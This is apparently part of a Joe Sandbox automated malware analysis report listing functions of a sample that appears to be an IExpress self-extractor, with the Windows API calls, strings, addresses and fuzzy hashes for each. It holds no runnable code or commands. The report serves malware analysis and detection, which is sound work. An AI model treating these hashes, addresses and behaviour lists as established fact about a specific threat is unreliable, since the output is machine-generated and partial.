Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID: ppS
API String ID: 1084409-1995294970
Opcode ID: be239af77740f086027c495216554748c12b4ea992588ddbd720f4d93ff3bd3e
Instruction ID: 65159ca4224fcec9f75cd5b859f517e6d2651d19d1356fe94101303470b69419
Opcode Fuzzy Hash: be239af77740f086027c495216554748c12b4ea992588ddbd720f4d93ff3bd3e
Instruction Fuzzy Hash: 02018471201201AFD7148F56FC45BA67769E754725F049227F939BB2E1CB70DC16C740

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00ED4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00ED4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00ED4C7E

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 27cb6291ca1df634c5bc15dd06ace9d3c4abc2c710684020f43d70f197aa5dd9
Instruction ID: 78ccc3f1e3e44148600aaa72143a5fb329306e097631f9e747b3dbffb0445e0b
Opcode Fuzzy Hash: 27cb6291ca1df634c5bc15dd06ace9d3c4abc2c710684020f43d70f197aa5dd9
Instruction Fuzzy Hash: 66F096B251210D6FAB14DFB5DC49DBBB7ADEB14244744163BA415E11D0FA30D915C760

Uniqueness

Uniqueness Score: -1.00%

Function 00ED487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00ED4A23,?,00ED4F67,*MEMCAB,00008000,00000180), ref: 00ED48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00ED4F67,*MEMCAB,00008000,00000180), ref: 00ED4902

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d9505dc501b4c4d2426071092b80cbeb0a232f457cd6d6283d9c355bc4bec5d1
Instruction ID: 1d888d8ea5fad0e667fd0bac25a40dbd2613f12edb7dec7952990866f0bf6a85
Opcode Fuzzy Hash: d9505dc501b4c4d2426071092b80cbeb0a232f457cd6d6283d9c355bc4bec5d1
Instruction Fuzzy Hash: E2017CE7E126302AF32440294C48FB7450CCBE6675F1A2232BDEAB62C1D1644C0591E0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CharPrevA.USER32(00ED8B3E,00ED8B3F,00000001,00ED8B3E,-00000003,?,00ED60EC,00ED1140,?), ref: 00ED65BA

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 1a2cbfa7b8e9d096e874919470bce620ed7cb12e9f4ab12c328656fb6481fd59
Instruction ID: 8a7e8088b792926dea1519e13c0b373208f22198022d18613733652c5c186675
Opcode Fuzzy Hash: 1a2cbfa7b8e9d096e874919470bce620ed7cb12e9f4ab12c328656fb6481fd59
Instruction Fuzzy Hash: F2F0A2321042505FD331450DB884BA6BFCDDB86310F18196FE8DAE3349CA558C8783A0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00ED623F

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Part of subcall function 00ED6285: GetLastError.KERNEL32(00ED5BBC), ref: 00ED6285

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: f843b450ec85d94a527fcc8e4065a5595c6321b04948c99565bd6cc85b17fc87
Instruction ID: 5134210f24dd123a2ff2e71116b8de1d613e95b03fddf3f51579eda904bff30c
Opcode Fuzzy Hash: f843b450ec85d94a527fcc8e4065a5595c6321b04948c99565bd6cc85b17fc87
Instruction Fuzzy Hash: 62F0E9B07002086FE750EB74DD02FBE73ECDB54300F40006BB985FA292DD749D498650

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00ED4FA1,00000000), ref: 00ED4B98

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9255d2f4082ab314feec3a8ff405e7821ca211ff6a27a838ad5aabe12d0f6a5f
Instruction ID: 1fe8c01e2ce0eb1d7bef3e5d9f3e29fb06759c7c3528decc5749d81b19c9ffb9
Opcode Fuzzy Hash: 9255d2f4082ab314feec3a8ff405e7821ca211ff6a27a838ad5aabe12d0f6a5f
Instruction Fuzzy Hash: D2F0FE71500B0C9F87619E3A9D06652BBEBEBB53603101A2B94AEF22D0DB70A841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,00ED4777,?,00ED4E38,?), ref: 00ED66B1

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fd256453978f60bef20fb499ad78f51721e8a097e06501129096aabc48b82fc6
Instruction ID: 036fcfbff325afb019e9e24f436220a8614d07ef72b3a1c1349336295c56d326
Opcode Fuzzy Hash: fd256453978f60bef20fb499ad78f51721e8a097e06501129096aabc48b82fc6
Instruction Fuzzy Hash: FCB0927622244046AA2007367C295662941E7C123A7E86BA2F032E02E0CA3EC94AD004

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00ED4CAA

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 95362a213f9b08db58e219928ab11d94a99813c01974c587fbe167697fffd367
Instruction ID: 9ccc1577c40ac2fee2933f3420edeb96db2dc77c53968a25bf789bac2e8ddb3b
Opcode Fuzzy Hash: 95362a213f9b08db58e219928ab11d94a99813c01974c587fbe167697fffd367
Instruction Fuzzy Hash: 33B0123204420CBBCF002FD3FC09F853F1DEBC4761F184011F60C49050CAB295108696

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 00ED4CC8

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 3371e480f445bbc383c05bc86d42bdb87cb17ddb59b79c051de218ec4973297b
Instruction ID: 82585cc9551a89931446670b8f5aa4507f05201181a4087acfe0cabc8ff1c971
Opcode Fuzzy Hash: 3371e480f445bbc383c05bc86d42bdb87cb17ddb59b79c051de218ec4973297b
Instruction Fuzzy Hash: A7B0123100010CBBCF002B53FC088453F1DD7C42607040021F50C45021CB7399118585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00ED5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00ED5CEE
GetModuleFileNameA.KERNEL32(00ED8B3E,00000104,00000000,?,?), ref: 00ED5DFC
CharUpperA.USER32(?), ref: 00ED5E3E
CharUpperA.USER32(-00000052), ref: 00ED5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00ED5F6F
CharUpperA.USER32(?), ref: 00ED5FA7
CharUpperA.USER32(-0000004E), ref: 00ED6008
CharUpperA.USER32(?), ref: 00ED60AA
CloseHandle.KERNEL32(00000000,00ED1140,00000000,00000040,00000000), ref: 00ED61F1
ExitProcess.KERNEL32 ref: 00ED61F8

Strings

", xrefs: 00ED5D78
", xrefs: 00ED612D
:, xrefs: 00ED6118
RegServer, xrefs: 00ED5F66

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: cc2caa88081ff39265ee4e789eacb2316ec74a2d104146e50e2ff7af2ddacdf7
Instruction ID: 9eedbfe83b52ccc112d70bd1aefa684afcbff53872726914907b361de5a10352
Opcode Fuzzy Hash: cc2caa88081ff39265ee4e789eacb2316ec74a2d104146e50e2ff7af2ddacdf7
Instruction Fuzzy Hash: 27D17C73A04A445EDF359B399C487FA7BA2E756308F1430A7C486FA391DB708E878B50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00ED1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00ED1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00ED1FD3

Strings

SeShutdownPrivilege, xrefs: 00ED1F28

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 444317fd2c48005fde0d7627abf08e0ec5c587ab273bd15c2545615361f04b48
Instruction ID: 80f1fb0ca97f6104b6f7a28972f04ffcf64a0bdf6f44f7ccf6838c8a3acada1f
Opcode Fuzzy Hash: 444317fd2c48005fde0d7627abf08e0ec5c587ab273bd15c2545615361f04b48
Instruction Fuzzy Hash: 1921E6B1B412057BDB205BA2DC4AFBF77B8DF85714F14106BFA01F6281D77488469261

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00ED6E26,00ED1000), ref: 00ED6CF7
UnhandledExceptionFilter.KERNEL32(&n,?,00ED6E26,00ED1000), ref: 00ED6D00
GetCurrentProcess.KERNEL32(C0000409,?,00ED6E26,00ED1000), ref: 00ED6D0B
TerminateProcess.KERNEL32(00000000,?,00ED6E26,00ED1000), ref: 00ED6D12

Strings

&n, xrefs: 00ED6CFD

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n
API String ID: 3231755760-661210962
Opcode ID: 220856d40d34431af323ac5b3ed2bc6d55fad49904f6424eecf8987523821eb5
Instruction ID: 8aba73dc6da8cc74f8f87c6dd02aca44751f3fb0ba101b75cbcc9030932da3d2
Opcode Fuzzy Hash: 220856d40d34431af323ac5b3ed2bc6d55fad49904f6424eecf8987523821eb5
Instruction Fuzzy Hash: 00D0C9B2003108FFDB002BF2FC0CA693F28EB48212F4C4022F319A6020CA3246558B52

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32(000003E8,00ED8598,00000200), ref: 00ED3271
GetDesktopWindow.USER32 ref: 00ED33E2
SetWindowTextA.USER32(?,smo), ref: 00ED33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00ED3410
GetDlgItem.USER32(?,00000836), ref: 00ED3426
EnableWindow.USER32(00000000), ref: 00ED342D
EndDialog.USER32(?,00000000), ref: 00ED343F

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED32E2, 00ED32E7, 00ED3331, 00ED3344, 00ED335B, 00ED336A
smo, xrefs: 00ED33F1

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$smo
API String ID: 2418873061-1155430921
Opcode ID: a3cc0739f32ab5345c9e826bb6a95e22d2041d73a31f84d102bba7df0025625d
Instruction ID: 3c548dc38f47588d06b57ef5bd6d81af9249ff7d90a7dbeb99dad1d757b26165
Opcode Fuzzy Hash: a3cc0739f32ab5345c9e826bb6a95e22d2041d73a31f84d102bba7df0025625d
Instruction Fuzzy Hash: 0F5149703822517FE7211B36AD4CFBF6A49DB46B48F14603BF155B63D1CAA88B079263

Uniqueness

Uniqueness Score: -1.00%

Function 00ED34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000), ref: 00ED3535
EndDialog.USER32(?,?), ref: 00ED3541
ResetEvent.KERNEL32 ref: 00ED355F
SetEvent.KERNEL32(00ED1140,00000000,00000020,00000004), ref: 00ED3590
GetDesktopWindow.USER32 ref: 00ED35C7
GetDlgItem.USER32(?,0000083B), ref: 00ED35F1
SendMessageA.USER32(00000000), ref: 00ED35F8
GetDlgItem.USER32(?,0000083B), ref: 00ED3610
SendMessageA.USER32(00000000), ref: 00ED3617
SetWindowTextA.USER32(?,smo), ref: 00ED3623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00ED8798), ref: 00ED3637
EndDialog.USER32(?,00000000), ref: 00ED3671

Strings

smo, xrefs: 00ED361D

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: smo
API String ID: 2406144884-2762499640
Opcode ID: de6068320a606b2cd43f7d29206075923a6ae65a1a1d8f76ccec2c08d560f17d
Instruction ID: d00807159614f921317e610d9b934c8970171d854c224538931a542bf4051047
Opcode Fuzzy Hash: de6068320a606b2cd43f7d29206075923a6ae65a1a1d8f76ccec2c08d560f17d
Instruction Fuzzy Hash: 7D31AEB0202301BFD7205B36FD0DE6A3B69E785B00F18652BF612B53E1CA718A06CA56

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00ED4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00ED424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00ED4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00ED427A
GetTempPathA.KERNEL32(00000104,00ED88C0,?,00000001), ref: 00ED429F
CharPrevA.USER32(00ED88C0,01DB1181,?,00000001), ref: 00ED42C2
CharPrevA.USER32(00ED88C0,00000000,?,00000001), ref: 00ED42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00ED4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00ED43A5

Strings

SHGetPathFromIDList, xrefs: 00ED4274
SHBrowseForFolder, xrefs: 00ED4246
SHELL32.DLL, xrefs: 00ED422F

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 5ba186d0656dfd1ed494132b279a05b9274509f532c571b6e0d11aa88775b468
Instruction ID: cccbb5b85ef2b4a878636c8ed493c2a5f9328427a90568f35f6cbea88c702b3f
Opcode Fuzzy Hash: 5ba186d0656dfd1ed494132b279a05b9274509f532c571b6e0d11aa88775b468
Instruction Fuzzy Hash: 9D4126B4A01340AFD711AF75EC85A6E7BB4EB54348F48106BE901B7391CB758D07C761

Uniqueness

Uniqueness Score: -1.00%

Function 00ED44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00ED45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00ED45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00ED460D
MessageBeep.USER32(00000000), ref: 00ED4630
MessageBoxA.USER32(?,00000000,smo,00000000), ref: 00ED4666
LocalFree.KERNEL32(00000000), ref: 00ED466F

Part of subcall function 00ED681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00ED686E
Part of subcall function 00ED681F: GetSystemMetrics.USER32(0000004A), ref: 00ED68A7
Part of subcall function 00ED681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00ED68CC
Part of subcall function 00ED681F: RegQueryValueExA.ADVAPI32(?,00ED1140,00000000,?,?,0000000C), ref: 00ED68F4
Part of subcall function 00ED681F: RegCloseKey.ADVAPI32(?), ref: 00ED6902

Strings

LoadString() Error. Could not load string resource., xrefs: 00ED44E4
smo, xrefs: 00ED4545, 00ED465A

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$smo
API String ID: 3244514340-2161240188
Opcode ID: e6b46ca5387fa65726d99dc080e62da013448c3b4756aa7db49a0a5b0720930f
Instruction ID: 68f7285c871d6fdcc809a7735b74f150ed6c22bf7b6297c0e064d8fa5da5523b
Opcode Fuzzy Hash: e6b46ca5387fa65726d99dc080e62da013448c3b4756aa7db49a0a5b0720930f
Instruction Fuzzy Hash: 1151E6B1901115AFDB219F28EC48BAA7BB9EF55304F045197F919B7381DB31DE0ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON

Download Yara Rule

APIs

CharUpperA.USER32(72E96697,00000000,00000000,00000000), ref: 00ED27A8
CharNextA.USER32(0000054D), ref: 00ED27B5
CharNextA.USER32(00000000), ref: 00ED27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED2829
RegQueryValueExA.ADVAPI32(?,00ED1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00ED28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00ED28AA
GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 00ED28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00ED27E4

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: d2d473a5d8bbec4d176ff74ed60f25bb6716ce89d6460ba428292dd9338931bb
